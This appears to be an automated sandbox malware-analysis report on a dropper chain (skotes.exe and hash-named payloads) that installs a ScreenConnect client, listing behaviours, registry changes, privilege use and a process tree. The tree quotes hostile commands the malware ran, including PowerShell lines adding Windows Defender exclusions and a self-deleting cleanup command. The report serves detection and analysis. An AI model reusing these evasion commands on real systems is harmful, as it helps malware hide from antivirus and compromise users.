System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7004 powershell.exe 2140 PING.EXE 5456 powershell.exe 5076 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d4141155d34ac580000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d4141150000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d414115000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d414115000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d41411500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4b8d248ac5a44344a64afd9f747a9e45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4b8d248ac5a44344a64afd9f747a9e45.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6700 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2140 PING.EXE 5076 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6088 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 4612 skotes.exe 4612 skotes.exe 4028 NN9Dd7c.exe 804 powershell.exe 804 powershell.exe 1936 powershell.exe 1936 powershell.exe 4848 INOKWGC.exe 4848 INOKWGC.exe 4848 INOKWGC.exe 2904 4b8d248ac5a44344a64afd9f747a9e45.exe 2904 4b8d248ac5a44344a64afd9f747a9e45.exe 4652 msedge.exe 4652 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 6672 skotes.exe 6672 skotes.exe 5228 identity_helper.exe 5228 identity_helper.exe 4988 msiexec.exe 4988 msiexec.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 4688 powershell.exe 4688 powershell.exe 4688 powershell.exe 6868 7796213aa8.exe 6868 7796213aa8.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 5544 InstallUtil.exe 5544 InstallUtil.exe 3220 4ba8da5cdc.exe 3220 4ba8da5cdc.exe 6680 3573f91eb8.exe 6680 3573f91eb8.exe 3760 c1e8d0e648.exe 3760 c1e8d0e648.exe 1540 4913480162.exe 1540 4913480162.exe 6460 skotes.exe 6460 skotes.exe 1540 4913480162.exe 1540 4913480162.exe 1540 4913480162.exe 1540 4913480162.exe 324 svchost.exe 324 svchost.exe 324 svchost.exe 324 svchost.exe 3508 804a4385fd.exe 3508 804a4385fd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4028 NN9Dd7c.exe Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 1684 ga70pjP.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeShutdownPrivilege 1864 msiexec.exe Token: SeIncreaseQuotaPrivilege 1864 msiexec.exe Token: SeSecurityPrivilege 4988 msiexec.exe Token: SeCreateTokenPrivilege 1864 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1864 msiexec.exe Token: SeLockMemoryPrivilege 1864 msiexec.exe Token: SeIncreaseQuotaPrivilege 1864 msiexec.exe Token: SeMachineAccountPrivilege 1864 msiexec.exe Token: SeTcbPrivilege 1864 msiexec.exe Token: SeSecurityPrivilege 1864 msiexec.exe Token: SeTakeOwnershipPrivilege 1864 msiexec.exe Token: SeLoadDriverPrivilege 1864 msiexec.exe Token: SeSystemProfilePrivilege 1864 msiexec.exe Token: SeSystemtimePrivilege 1864 msiexec.exe Token: SeProfSingleProcessPrivilege 1864 msiexec.exe Token: SeIncBasePriorityPrivilege 1864 msiexec.exe Token: SeCreatePagefilePrivilege 1864 msiexec.exe Token: SeCreatePermanentPrivilege 1864 msiexec.exe Token: SeBackupPrivilege 1864 msiexec.exe Token: SeRestorePrivilege 1864 msiexec.exe Token: SeShutdownPrivilege 1864 msiexec.exe Token: SeDebugPrivilege 1864 msiexec.exe Token: SeAuditPrivilege 1864 msiexec.exe Token: SeSystemEnvironmentPrivilege 1864 msiexec.exe Token: SeChangeNotifyPrivilege 1864 msiexec.exe Token: SeRemoteShutdownPrivilege 1864 msiexec.exe Token: SeUndockPrivilege 1864 msiexec.exe Token: SeSyncAgentPrivilege 1864 msiexec.exe Token: SeEnableDelegationPrivilege 1864 msiexec.exe Token: SeManageVolumePrivilege 1864 msiexec.exe Token: SeImpersonatePrivilege 1864 msiexec.exe Token: SeCreateGlobalPrivilege 1864 msiexec.exe Token: SeCreateTokenPrivilege 1864 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1864 msiexec.exe Token: SeLockMemoryPrivilege 1864 msiexec.exe Token: SeIncreaseQuotaPrivilege 1864 msiexec.exe Token: SeMachineAccountPrivilege 1864 msiexec.exe Token: SeTcbPrivilege 1864 msiexec.exe Token: SeSecurityPrivilege 1864 msiexec.exe Token: SeTakeOwnershipPrivilege 1864 msiexec.exe Token: SeLoadDriverPrivilege 1864 msiexec.exe Token: SeSystemProfilePrivilege 1864 msiexec.exe Token: SeSystemtimePrivilege 1864 msiexec.exe Token: SeProfSingleProcessPrivilege 1864 msiexec.exe Token: SeIncBasePriorityPrivilege 1864 msiexec.exe Token: SeCreatePagefilePrivilege 1864 msiexec.exe Token: SeCreatePermanentPrivilege 1864 msiexec.exe Token: SeBackupPrivilege 1864 msiexec.exe Token: SeRestorePrivilege 1864 msiexec.exe Token: SeShutdownPrivilege 1864 msiexec.exe Token: SeDebugPrivilege 1864 msiexec.exe Token: SeAuditPrivilege 1864 msiexec.exe Token: SeSystemEnvironmentPrivilege 1864 msiexec.exe Token: SeChangeNotifyPrivilege 1864 msiexec.exe Token: SeRemoteShutdownPrivilege 1864 msiexec.exe Token: SeUndockPrivilege 1864 msiexec.exe Token: SeSyncAgentPrivilege 1864 msiexec.exe Token: SeEnableDelegationPrivilege 1864 msiexec.exe Token: SeManageVolumePrivilege 1864 msiexec.exe Token: SeImpersonatePrivilege 1864 msiexec.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 1864 msiexec.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 1864 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5544 InstallUtil.exe 5200 057af55804f941a1bfb3623a361b7ab9.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1868 wrote to memory of 4612 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 82 PID 1868 wrote to memory of 4612 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 82 PID 1868 wrote to memory of 4612 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 82 PID 4612 wrote to memory of 4028 4612 skotes.exe 85 PID 4612 wrote to memory of 4028 4612 skotes.exe 85 PID 4612 wrote to memory of 4028 4612 skotes.exe 85 PID 4028 wrote to memory of 804 4028 NN9Dd7c.exe 89 PID 4028 wrote to memory of 804 4028 NN9Dd7c.exe 89 PID 4028 wrote to memory of 804 4028 NN9Dd7c.exe 89 PID 4612 wrote to memory of 1684 4612 skotes.exe 92 PID 4612 wrote to memory of 1684 4612 skotes.exe 92 PID 4612 wrote to memory of 1684 4612 skotes.exe 92 PID 4028 wrote to memory of 1936 4028 NN9Dd7c.exe 93 PID 4028 wrote to memory of 1936 4028 NN9Dd7c.exe 93 PID 4028 wrote to memory of 1936 4028 NN9Dd7c.exe 93 PID 1684 wrote to memory of 1864 1684 ga70pjP.exe 95 PID 1684 wrote to memory of 1864 1684 ga70pjP.exe 95 PID 1684 wrote to memory of 1864 1684 ga70pjP.exe 95 PID 4988 wrote to memory of 4916 4988 msiexec.exe 98 PID 4988 wrote to memory of 4916 4988 msiexec.exe 98 PID 4988 wrote to memory of 4916 4988 msiexec.exe 98 PID 4916 wrote to memory of 1460 4916 MsiExec.exe 99 PID 4916 wrote to memory of 1460 4916 MsiExec.exe 99 PID 4916 wrote to memory of 1460 4916 MsiExec.exe 99 PID 4612 wrote to memory of 4848 4612 skotes.exe 104 PID 4612 wrote to memory of 4848 4612 skotes.exe 104 PID 4612 wrote to memory of 4848 4612 skotes.exe 104 PID 4028 wrote to memory of 2904 4028 NN9Dd7c.exe 105 PID 4028 wrote to memory of 2904 4028 NN9Dd7c.exe 105 PID 4028 wrote to memory of 2904 4028 NN9Dd7c.exe 105 PID 4028 wrote to memory of 5052 4028 NN9Dd7c.exe 106 PID 4028 wrote to memory of 5052 4028 NN9Dd7c.exe 106 PID 4612 wrote to memory of 1784 4612 skotes.exe 107 PID 4612 wrote to memory of 1784 4612 skotes.exe 107 PID 4612 wrote to memory of 1784 4612 skotes.exe 107 PID 1784 wrote to memory of 540 1784 8ZVMneG.exe 109 PID 1784 wrote to memory of 540 1784 8ZVMneG.exe 109 PID 1784 wrote to memory of 540 1784 8ZVMneG.exe 109 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 1784 wrote to memory of 656 1784 8ZVMneG.exe 110 PID 5052 wrote to memory of 4108 5052 cfe32a70b98540d9861909672f4b70a8.exe 111 PID 5052 wrote to memory of 4108 5052 cfe32a70b98540d9861909672f4b70a8.exe 111 PID 4108 wrote to memory of 804 4108 msedge.exe 112 PID 4108 wrote to memory of 804 4108 msedge.exe 112 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 PID 4108 wrote to memory of 4520 4108 msedge.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 6368 attrib.exe 4876 attrib.exe 1908 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2664
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:324
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe"C:\Users\Admin\AppData\Local\Temp\055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\pppkes"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe"C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2904 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe" & rd /s /q "C:\ProgramData\T0HDJM7QQ9RI" & exit6⤵
- System Location Discovery: System Language Discovery
PID:5412 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6700
-
-
-
-
C:\pppkes\cfe32a70b98540d9861909672f4b70a8.exe"C:\pppkes\cfe32a70b98540d9861909672f4b70a8.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff0df746f8,0x7fff0df74708,0x7fff0df747187⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:27⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,12197951249115487109,8531847658453266548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:4652
-
-
